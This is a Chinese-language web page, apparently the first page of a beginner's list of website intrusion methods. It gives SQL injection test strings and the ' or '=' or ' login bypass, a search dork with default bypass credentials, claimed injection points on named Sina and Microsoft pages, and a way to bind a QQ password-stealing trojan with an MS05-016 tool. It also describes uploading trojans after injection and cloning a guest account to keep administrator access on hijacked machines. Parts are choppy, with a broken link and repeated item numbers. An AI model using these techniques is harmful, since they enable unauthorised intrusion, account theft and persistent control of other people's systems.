常研究網(wǎng)站入侵，

入侵網(wǎng)站的方法大集合（適合新手）

大多現(xiàn)在比較少了。但有些仍管用。適合新手，老鳥略過。。

有些也可回味下。。

1.網(wǎng)寬網(wǎng)絡(luò)有限公司制作的網(wǎng)站基本都有注入漏洞 搜索網(wǎng)寬網(wǎng)絡(luò)

2.搜索欄里輸入

關(guān)鍵字%’and 1=1 and ’%’=’

關(guān)鍵字%’and 1=2 and ’%’=’

比較不同處 可以作為注入的特征字符

3.登陸框用戶名和密碼輸入’or’=’or’ 漏洞很老但是現(xiàn)在很是遍地都是

4.我們先到www.google.com底下搜索一下co net mib ver 1.0

密碼帳號都是 ’or’=’or’

5.掛馬代碼

6.http://www.wyyfk.com/24小時掛QQ工具 （這個暫時不能用了）

7.開啟regedt32的sam的管理員權(quán)限 檢查hkey_local_machinesamsam和hkey_local_machinesamsam下的管理員和guest的f鍵值,如果一樣就是用被入侵過了,然后刪了guest帳號,對方可以用guest帳號使用administraeors的權(quán)限,你也可以用這方法留住肉雞,這方法是簡單克隆,

net localgroup administrators還是可以看出guest是管理員來

7.只要敢想,新浪也可入侵 注入點

http://igame.sina.com.cn/plaza/event/new/crnt_event_vIEw.asp?event_id=59

微軟 注入點

http://www.microsoft.com/library/toolbar/3.0/search.aspx?vIEw=en-us&charset=iso-8859-1&qu=

（這是新浪的ASP程序）

8.ms05016攻擊工具用法 mshta.exe test.hta 文件名.后綴名 可以綁上QQ大盜木馬

9.有sa權(quán)限sqlserver數(shù)據(jù)庫、并且能sql注入支持fso+asp的服務(wù)器

sql注入后，如何上傳木馬,

文章地址http://hack123.home4u.china.com/0601.htm

10.QQ強制聊天代碼

qq.com/msgrd?v=1&uin=" target=_blank>http://wpa.QQ.com/msgrd?v=1&uin=對方的QQ號&site=ioshenmue&menu=yes

使用方法：把代碼中的紅色的“********”星號換成你想與其聊天的qq號后復(fù) 制到瀏覽器的地址欄處即可，

電腦資料

[1][2][3][4]下一頁